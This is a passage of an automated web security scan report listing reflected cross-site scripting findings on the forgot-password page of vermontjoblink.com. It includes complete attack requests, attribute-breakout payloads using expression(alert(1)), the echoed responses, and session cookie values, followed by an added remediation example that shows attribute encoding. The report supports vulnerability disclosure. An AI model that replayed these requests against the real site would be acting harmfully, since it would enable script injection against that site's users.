PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="RAND_prev" value="1688523251d"style="x:expression(alert(1))"958bb28727d" />
...[SNIP]...
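The vermontjoblink.com findings (3.119 through 3.125) are all the same attribute-context defect: a request value is written into a double-quoted HTML attribute without encoding, so a `"` in the value closes the attribute and whatever follows is parsed as further attributes. The `expression()` trick is Internet Explorer specific, but the breakout itself is not. The block below is an added example, not code from the report or from the application; it renders the hidden field from finding 3.120 with an assumed vulnerable template and with HTML attribute encoding applied, and uses a small approximation of the browser's attribute tokenizer as the check, so the reader can see which attributes a browser would actually receive in each case. Function names are assumptions.

```javascript
// Added example (not from the report or the scanned application).
// Mirrors finding 3.120:
//   <input type="hidden" name="RAND_prev" value="<rand>" />

// Payload from the report (finding 3.120), i.e. the value of the rand parameter.
const DEMO_RAND = '1688523251d"style="x:expression(alert(1))"958bb28727d';

// Vulnerable rendering (assumed): the value is interpolated verbatim.
function renderHiddenFieldVulnerable(name, value) {
  return '<input type="hidden" name="' + name + '" value="' + value + '" />';
}

// Encode the five characters that can change meaning in an HTML attribute or
// text node. With " encoded, no value can close a double-quoted attribute.
function htmlAttrEncode(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  })[c]);
}

function renderHiddenFieldHardened(name, value) {
  return '<input type="hidden" name="' + htmlAttrEncode(name) +
    '" value="' + htmlAttrEncode(value) + '" />';
}

// Approximation of the HTML attribute tokenizer for one start tag: returns the
// attributes a browser would see (names lower-cased). A quoted value ends at the
// matching quote, so an unencoded " inside the data starts a new attribute.
function parseAttributes(tag) {
  const inner = tag.replace(/^<[A-Za-z][^\s\/>]*/, '').replace(/\/?>\s*$/, '');
  const re = /([^\s"'=\/>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;
  const attrs = {};
  let m;
  while ((m = re.exec(inner)) !== null) {
    const val = m[2] !== undefined ? m[2]
      : m[3] !== undefined ? m[3]
      : m[4] !== undefined ? m[4] : '';
    attrs[m[1].toLowerCase()] = val;
  }
  return attrs;
}

console.log('vulnerable:', parseAttributes(renderHiddenFieldVulnerable('RAND_prev', DEMO_RAND)));
console.log('hardened:  ', parseAttributes(renderHiddenFieldHardened('RAND_prev', DEMO_RAND)));
```

Parsing the vulnerable output yields `value="1688523251d"` followed by a separate `style="x:expression(alert(1))"` attribute (plus a junk attribute from the trailing marker), which is exactly what the response on the page shows a browser receiving; the hardened output keeps the entire payload inside `value` as inert text. Encoding must be chosen for the context the data lands in: this encoder is correct for attribute values and text nodes, not for JavaScript string literals or URLs.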

3.121. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [BLTEXTBOXEXTRADONOTUSE1_prev parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the BLTEXTBOXEXTRADONOTUSE1_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5253"style%3d"x%3aexpression(alert(1))"6a3bba82691 was submitted in the BLTEXTBOXEXTRADONOTUSE1_prev parameter. This input was echoed as c5253"style="x:expression(alert(1))"6a3bba82691 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 613

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&
...[SNIP]...
SSAGE_prev=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&CFTEXTBOXEXTRADONOTUSE_prev=&RAND_prev=1902&BLTEXTBOXEXTRADONOTUSE1_prev=c5253"style%3d"x%3aexpression(alert(1))"6a3bba82691&OLD_CHOICE_prev=2&FORMID_prev=10&SECURITYSYS_prev=on&FormName=Form0

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:02 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:09:02'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="bltextboxextradonotuse1" value="c5253"style="x:expression(alert(1))"6a3bba82691" class="cfTransparent" />
...[SNIP]...

3.122. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [CFTEXTBOXEXTRADONOTUSE_prev parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the CFTEXTBOXEXTRADONOTUSE_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8487"style%3d"x%3aexpression(alert(1))"a92543e7b70 was submitted in the CFTEXTBOXEXTRADONOTUSE_prev parameter. This input was echoed as a8487"style="x:expression(alert(1))"a92543e7b70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 613

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&
...[SNIP]...
=2&ERRORFIELDS_prev=usvuserid&LIBRARY_ERRORMESSAGE_prev=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&CFTEXTBOXEXTRADONOTUSE_prev=a8487"style%3d"x%3aexpression(alert(1))"a92543e7b70&RAND_prev=1902&BLTEXTBOXEXTRADONOTUSE1_prev=&OLD_CHOICE_prev=2&FORMID_prev=10&SECURITYSYS_prev=on&FormName=Form0

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:55'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="cftextboxextradonotuse" value="a8487"style="x:expression(alert(1))"a92543e7b70" class="cfTransparent" />
...[SNIP]...

3.123. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [ERRORFIELDS parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the ERRORFIELDS request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6034"style%3d"x%3aexpression(alert(1))"b3d03e576d5baaa17 was submitted in the ERRORFIELDS parameter. This input was echoed as b6034"style="x:expression(alert(1))"b3d03e576d5baaa17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

The original request used the POST method; it was possible to convert it to a GET request, which makes the attack easier to demonstrate and to deliver as a single link.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuseridb6034"style%3d"x%3aexpression(alert(1))"b3d03e576d5baaa17&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:01 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="ERRORFIELDS_prev" value="usvuseridb6034"style="x:expression(alert(1))"b3d03e576d5baaa17" />
...[SNIP]...

3.124. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FORMID_prev parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the FORMID_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d2b5"style%3d"x%3aexpression(alert(1))"372f5e60b41 was submitted in the FORMID_prev parameter. This input was echoed as 8d2b5"style="x:expression(alert(1))"372f5e60b41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 613

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&
...[SNIP]...
e%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&CFTEXTBOXEXTRADONOTUSE_prev=&RAND_prev=1902&BLTEXTBOXEXTRADONOTUSE1_prev=&OLD_CHOICE_prev=2&FORMID_prev=108d2b5"style%3d"x%3aexpression(alert(1))"372f5e60b41&SECURITYSYS_prev=on&FormName=Form0

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:08 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:09:08'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="formid" value="108d2b5"style="x:expression(alert(1))"372f5e60b41" class="cfTransparent" />
...[SNIP]...

3.125. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FORMNAME_prev parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the FORMNAME_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a32fd"style%3d"x%3aexpression(alert(1))"645ffa01d98 was submitted in the FORMNAME_prev parameter. This input was echoed as a32fd"style="x:expression(alert(1))"645ffa01d98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 613

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&U_name=yes&choice=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&FORMNAME_prev=Form0a32fd"style%3d"x%3aexpression(alert(1))"645ffa01d98&CHOICE_prev=2&ERRORFIELDS_prev=usvuserid&LIBRARY_ERRORMESSAGE_prev=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&CFTEXTBOXEXTRADO
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:51'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="formname" value="Form0a32fd"style="x:expression(alert(1))"645ffa01d98" class="cfTransparent" />
...[SNIP]...

3.126. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FormID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the FormID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50bdc"><a>d414acd7200 was submitted in the FormID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=1050bdc"><a>d414acd7200&rand=1902 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 499

library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cf
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
